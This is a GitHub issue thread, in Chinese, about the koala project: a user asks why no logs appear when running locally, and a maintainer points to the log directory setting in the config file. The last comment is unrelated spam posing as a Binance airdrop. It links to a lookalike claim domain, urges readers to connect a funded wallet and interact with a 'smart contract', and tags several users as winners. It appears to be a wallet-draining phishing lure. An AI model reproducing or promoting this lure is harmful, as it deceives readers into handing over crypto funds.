### ISSUE TITLE
日志问题

### ISSUE THREAD

**Issue by HCY2315** [heiyeluren/koala#8]
直接在本地执行的时候不打印任何日志，是这样的么？

**Comment by houseme** [comment]
看这里 https://github.com/heiyeluren/koala/blob/00153f3caafa115cd4d6aed5392508883958563f/conf/koala.conf#L64

会打印，请问日志目录本地存在吗？

**Comment by HCY2315** [comment]
好的谢谢，还有个问题，
![image](https://github.com/heiyeluren/koala/assets/63346084/ae5f64ff-85df-42e8-82a6-d74f224bc679)

这个参数是这么用的么

**Comment by houseme** [comment]
> 好的谢谢，还有个问题， ![image](https://private-user-images.githubusercontent.com/63346084/289721751-ae5f64ff-85df-42e8-82a6-d74f224bc679.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTEiLCJleHAiOjE3MDIzNTQ2ODEsIm5iZiI6MTcwMjM1NDM4MSwicGF0aCI6Ii82MzM0NjA4NC8yODk3MjE3NTEtYWU1ZjY0ZmYtODVkZi00MmU4LTgyYTYtZDc0ZjIyNGJjNjc5LnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFJV05KWUFYNENTVkVINTNBJTJGMjAyMzEyMTIlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjMxMjEyVDA0MTMwMVomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPWJiMGI4ODJhMDFkMDU3NmFmYzRlYTcxNzBiMThiYWQ0YjdlMjg2YmUyM2IxOTAwYTkxOGZlODE1ODMyNDRlY2YmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.-N6NhEbhw3oOfbGee5-J3qxlzhEYSIWAZCp9ESSkDCM)
> 
> 这个参数是这么用的么

直接翻看一下源码呗

**Comment by YourNPC** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://claim.bnbchainnetwork.xyz/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://claim.bnbchainnetwork.xyz/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @nekomiya-kasane, @vlean, @danieltyx, @Astraeux, @dsyanglei, @MarineHuang, @Moses0905
